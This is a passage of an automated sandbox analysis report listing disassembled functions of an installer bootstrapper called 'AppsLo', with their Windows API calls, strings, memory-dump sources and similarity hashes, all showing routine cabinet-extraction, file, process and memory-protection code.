String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 873087278efb905b2d489c935cf582dd6a3aee7a9f04a973fcf2d6fb7e2ee11f
Instruction ID: 1f922537b9ff78aab471ac823c9c5a3526be7f6bb89d69266d7e6c1cf5ceb4dc
Opcode Fuzzy Hash: 873087278efb905b2d489c935cf582dd6a3aee7a9f04a973fcf2d6fb7e2ee11f
Instruction Fuzzy Hash: F921A976E4563A76EB2116A94CC9F27696CFF027B0B120139BE24FB642E774DC0045E1

Function 008DFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 008DFCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 008DFCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 008DFD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008DFD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 008DFD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008DFD8B

Strings

SystemFunction041, xrefs: 008DFCD8
CryptUnprotectMemory, xrefs: 008DFD6C
AdvApi32.dll, xrefs: 008DFCB5
Crypt32.dll, xrefs: 008DFD0C
SystemFunction040, xrefs: 008DFCCB
CryptProtectMemory, xrefs: 008DFD20
cryputil.cpp, xrefs: 008DFD60

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: cc06e70a6d08c33906a36e751c200e3d686c1af8abbb82c9031536c0a297cc51
Instruction ID: dbe2949694a5c4394be3c56972db6254bcec1879a08aa1378d623440684413bd
Opcode Fuzzy Hash: cc06e70a6d08c33906a36e751c200e3d686c1af8abbb82c9031536c0a297cc51
Instruction Fuzzy Hash: 46219232965236DFD7319B56AD057067A91FB50B59F120372FE11EA3E2EB609C00FAD0

Function 008C08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 008C08F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 008C090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 008C090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 008C0912
GetLastError.KERNEL32(?,?), ref: 008C091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 008C098B
GetLastError.KERNEL32(?,?), ref: 008C0998

Strings

Failed to add virtual file pointer for cab container., xrefs: 008C0971
cabextract.cpp, xrefs: 008C0940, 008C09BC
<the>.cab, xrefs: 008C08EB
Failed to duplicate handle to cab container., xrefs: 008C094A
Failed to open cabinet file: %hs, xrefs: 008C09C9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 0192fa0e8ad23ca39866f6947b84201bc3d98dbe55069be7a20d1f218492c841
Instruction ID: 58537d3f8af4cc9f3759e71f5722724c54162900fb713ff51fdfb4d2404b66eb
Opcode Fuzzy Hash: 0192fa0e8ad23ca39866f6947b84201bc3d98dbe55069be7a20d1f218492c841
Instruction Fuzzy Hash: D431E27294123AFBEB215AA58C49F5BBE68FF057B0F110125FE18FB251D774AD008AE1

Function 008B6A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,008A4E11,?,?), ref: 008B6A77
GetCurrentProcess.KERNEL32(?,00000000,?,?,008A4E11,?,?), ref: 008B6A7D
DuplicateHandle.KERNELBASE(00000000,?,?,008A4E11,?,?), ref: 008B6A80
GetLastError.KERNEL32(?,?,008A4E11,?,?), ref: 008B6A8A
CloseHandle.KERNEL32(000000FF,?,008A4E11,?,?), ref: 008B6B03

Strings

Failed to append the file handle to the command line., xrefs: 008B6AEB
burn.filehandle.attached, xrefs: 008B6AD0
%ls -%ls=%u, xrefs: 008B6AD7
core.cpp, xrefs: 008B6AAE
Failed to duplicate file handle for attached container., xrefs: 008B6AB8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: 72e095671b8d070f00d58dc06027b8c16894c16f9613f132eb3288af898d3af9
Instruction ID: 04084e3e498e3fcc1a342fc29baa9b781154da8ad49255d956d9f40954a61de4
Opcode Fuzzy Hash: 72e095671b8d070f00d58dc06027b8c16894c16f9613f132eb3288af898d3af9
Instruction Fuzzy Hash: 22114532A4162ABBCF109BA89C05E9E7B68FF05770F114255FA24F73D0E7789D109690

Function 008E0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,008A53BD,00000000,?,?,?,?,?,?,?,008B769D,00000000), ref: 008E0897
GetLastError.KERNEL32(?,?,?,?,?,?,?,008B769D,00000000), ref: 008E08A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,008B769D,00000000), ref: 008E08D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,008B769D,00000000), ref: 008E08EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,008B769D,00000000), ref: 008E092B

Strings

procutil.cpp, xrefs: 008E0919

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: 4677f6945d2d5aa6a759f8e69db77f20d10fc918eb4af47ebaebb4216abf498f
Instruction ID: ed43c8d4725068ad9e0f31cfb5275929cd806160a4f165586676f1486ee158cc
Opcode Fuzzy Hash: 4677f6945d2d5aa6a759f8e69db77f20d10fc918eb4af47ebaebb4216abf498f
Instruction Fuzzy Hash: F521C232D00669EBEB21AF969C44A9EBFA8FF11711F114066AD14EB251D3B09E40DED0

Function 008B6B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 008B6B49
CloseHandle.KERNEL32(00000000), ref: 008B6BB9

Strings

Failed to append the file handle to the command line., xrefs: 008B6B75
Failed to append the file handle to the obfuscated command line., xrefs: 008B6BA7
burn.filehandle.self, xrefs: 008B6B5A, 008B6B8C
%ls -%ls=%u, xrefs: 008B6B61, 008B6B93

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: 78c3e18af8a526205e252ee39276510891011c0acf1f74c70c56ceb768cf5e12
Instruction ID: 4fbf29851ca851dca536ac5655d088a63dd3534e2534f9e74cfb31b72f5db34b
Opcode Fuzzy Hash: 78c3e18af8a526205e252ee39276510891011c0acf1f74c70c56ceb768cf5e12
Instruction Fuzzy Hash: 4B11E932600A18BFDB205A68DC45FAB7BB8FB45734F150350FE24EB3E1E7B854214691

Function 008E3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 008E3574
InterlockedIncrement.KERNEL32(0090B6C8), ref: 008E3591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0090B6B8,?,?,?,?,?,?), ref: 008E35AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,0090B6B8,?,?,?,?,?,?), ref: 008E35B8

Strings

Msxml2.DOMDocument, xrefs: 008E35A7
MSXML.DOMDocument, xrefs: 008E35B3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: d510f80171ae7a4cce7adade6c75e87438395ea2b7358c979e110b922b16f57e
Instruction ID: 5417c9f66a7d10935573bdb3ec470a1cad171a218bef7f2b7e747efda5228b65
Opcode Fuzzy Hash: d510f80171ae7a4cce7adade6c75e87438395ea2b7358c979e110b922b16f57e
Instruction Fuzzy Hash: AEF03021B453A66BD3211B636D0DB1B2DA9FBC2B69F140429E900D72A4D361CD418AB0

Function 008E4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008E4A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 008E4ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 008E4AF6
GetLastError.KERNEL32(00000000,008EB7A0,?,00000000,?,00000000,?,00000000), ref: 008E4B34
GlobalFree.KERNEL32(00000000), ref: 008E4B65

Strings

fileutil.cpp, xrefs: 008E4AB8, 008E4B11

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 4942b0c6f63af6f981b718aa2ba99cf298de6739e1d638e9ab59d425a8507ee0
Instruction ID: b0701f8902a2978dc8eb0093f55f54a2141212a4fd7db96210195863ddca739f
Opcode Fuzzy Hash: 4942b0c6f63af6f981b718aa2ba99cf298de6739e1d638e9ab59d425a8507ee0
Instruction Fuzzy Hash: 4831C436D40279ABC7219ADA8C41FAFBAA8FF86760F114165FD58EB340E730DC0086D0

Function 008C0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 008C0B27
GetLastError.KERNEL32(?,?,?), ref: 008C0B31

Strings

cabextract.cpp, xrefs: 008C0B55
Failed to move file pointer 0x%x bytes., xrefs: 008C0B62
Invalid seek type., xrefs: 008C0ABD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 2041feda799b4a36bb8d650c4b1c07a51e7a0fe675d2ab00d991d70d5c599eeb
Instruction ID: e8bf2393bb0727b339b2d957790eb2a2a6f4db03bec0732023dd97b6e24085f2
Opcode Fuzzy Hash: 2041feda799b4a36bb8d650c4b1c07a51e7a0fe675d2ab00d991d70d5c599eeb
Instruction Fuzzy Hash: 3331A071A4062AEFCB15CFA8C884E6EB7B9FB04764B148229FA24D7651D734ED108F91

Function 008A4115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,008BA0E8,00000000,00000000,?,00000000,008A53BD,00000000,?,?,008AD5B5,?), ref: 008A4123
GetLastError.KERNEL32(?,008BA0E8,00000000,00000000,?,00000000,008A53BD,00000000,?,?,008AD5B5,?,00000000,00000000), ref: 008A4131
CreateDirectoryW.KERNEL32(?,840F01E8,008A5489,?,008BA0E8,00000000,00000000,?,00000000,008A53BD,00000000,?,?,008AD5B5,?,00000000), ref: 008A419A
GetLastError.KERNEL32(?,008BA0E8,00000000,00000000,?,00000000,008A53BD,00000000,?,?,008AD5B5,?,00000000,00000000), ref: 008A41A4

Strings

dirutil.cpp, xrefs: 008A41D4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 47689a9d63c706a63b8e88eca66a87057af6a3d80a35fa6a6428fe141e228566
Instruction ID: 40593c91c66a069ef4ab5725e35b086f5866dd0b944773ee8344ebfab2f7a275
Opcode Fuzzy Hash: 47689a9d63c706a63b8e88eca66a87057af6a3d80a35fa6a6428fe141e228566
Instruction Fuzzy Hash: 5C11D22660033596FF711AA54C80B3BB694FFF7B61F116021FE05EAA50E3E48C8192D1

Function 008A56A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,008A6595,008A6595,?,008A563D,?,?,00000000), ref: 008A56E5
GetLastError.KERNEL32(?,008A563D,?,?,00000000,?,?,008A6595,?,008A7F02,?,?,?,?,?), ref: 008A5714

Strings

version.dll, xrefs: 008A56D7
variable.cpp, xrefs: 008A5738
Failed to compare strings., xrefs: 008A5742

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: d098133064de3ccbc78e5fa75a60e51f775eb715b1171183116f1793eed1e44c
Instruction ID: e4c66b490792e8b947923d468f9e79dd3aac67a7f05f5fa33c6b975262ab6388
Opcode Fuzzy Hash: d098133064de3ccbc78e5fa75a60e51f775eb715b1171183116f1793eed1e44c
Instruction Fuzzy Hash: C3210436644A25EBD7108F98CD44A5ABBA4FB06730B210319F924FB790E630EE418690

Function 008E0A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,008A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008E0A38
GetLastError.KERNEL32(?,?,008A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008E0A46
GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 008E0A8B
GetLastError.KERNEL32(?,?,008A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008E0A95

Strings

procutil.cpp, xrefs: 008E0A6A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: 0b048e32f7e7ef85567ea943e19cb62e8eb009c134130ce8bfb27b0e2e96d77f
Instruction ID: b7674b79f939ec95ec46f2c2a5ef5071b18aa0005346d5e7a75aaff3ec6daca5
Opcode Fuzzy Hash: 0b048e32f7e7ef85567ea943e19cb62e8eb009c134130ce8bfb27b0e2e96d77f
Instruction Fuzzy Hash: 1C11A037D0537AEBC7208B969908A9F7AA4FF06760F124675FD64EB290D2B08D409ED1

Function 008C09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008C140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,008C0A19,?,?,?), ref: 008C1434
Part of subcall function 008C140C: GetLastError.KERNEL32(?,008C0A19,?,?,?), ref: 008C143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 008C0A27
GetLastError.KERNEL32 ref: 008C0A31

Strings

Failed to read during cabinet extraction., xrefs: 008C0A5F
cabextract.cpp, xrefs: 008C0A55

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 618578acedcc06839a6e6c65e06dd908bf8e1a0dcc427c491a6c2453156a165a
Instruction ID: f6d945c399c42dcd7b1a008af8ce77214ad49db167767369bf758e163df0b362
Opcode Fuzzy Hash: 618578acedcc06839a6e6c65e06dd908bf8e1a0dcc427c491a6c2453156a165a
Instruction Fuzzy Hash: 3611C276A00279FBCB219F99DC04E9A7B78FF057A0B014119FE14EB251C734D9108BD1

Function 008C140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,008C0A19,?,?,?), ref: 008C1434
GetLastError.KERNEL32(?,008C0A19,?,?,?), ref: 008C143E

Strings

Failed to move to virtual file pointer., xrefs: 008C146C
cabextract.cpp, xrefs: 008C1462

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 53657d522dfa17c950beecff7792769e42f9739653b9ca6ed1f1b9a1777fb0a2
Instruction ID: 888d74daf9df5b1046556cdb1426701f64a26a4a825e4042b4b8047506e840e8
Opcode Fuzzy Hash: 53657d522dfa17c950beecff7792769e42f9739653b9ca6ed1f1b9a1777fb0a2
Instruction Fuzzy Hash: BC01D43350063AB7DB254A968C48F8BBF25FF02770B118129FE28DA612D735D810C6D4

Function 008E3EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008E3F73
GetLastError.KERNEL32 ref: 008E3FD6

Strings

fileutil.cpp, xrefs: 008E3FFA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: 2e0c174cfcb9e6994826dfa347b9d4c80e5d817f27f15724032786211da9c7e4
Instruction ID: 93e138c67e9efcc636d2faf764f9364df95fce9a85d4fe9ddf520c11d4a14c57
Opcode Fuzzy Hash: 2e0c174cfcb9e6994826dfa347b9d4c80e5d817f27f15724032786211da9c7e4
Instruction Fuzzy Hash: 15317271E002A9AFDB21CF5AC844BDA77B4FB45751F0140AAFA48E7240DBB4DEC48B95

Function 008E4E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,008E3F9A,?,?,?), ref: 008E4E5E
GetLastError.KERNEL32(?,?,008E3F9A,?,?,?), ref: 008E4E68

Strings

fileutil.cpp, xrefs: 008E4E91

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: 9ee53d6f5a58a1b1b7378ad58d0adb639429252496e5314dcb54c4ce245b34f1
Instruction ID: 5bad30654118aa166fb3bd67d754480f3cbdbddfb6272c85749359d668aa5cd6
Opcode Fuzzy Hash: 9ee53d6f5a58a1b1b7378ad58d0adb639429252496e5314dcb54c4ce245b34f1
Instruction Fuzzy Hash: FCF06D33A0026AABC7208E9ACC45ADFBB6DFB45771F510125FD08E7140D730AE0086E0

Function 008E490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,008B8770,00000000,00000000,00000000,00000000,00000000), ref: 008E4925
GetLastError.KERNEL32(?,?,?,008B8770,00000000,00000000,00000000,00000000,00000000), ref: 008E492F

Strings

fileutil.cpp, xrefs: 008E4953

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: 8169b3e9f0f9e55a075c1397452c5a40b9096f68e5b7e373aeeb168785721cce
Instruction ID: 68e66cf9b0e41d72bd7e38051da4329fec6cef386b19d11ec50e78f7c31bb5f7
Opcode Fuzzy Hash: 8169b3e9f0f9e55a075c1397452c5a40b9096f68e5b7e373aeeb168785721cce
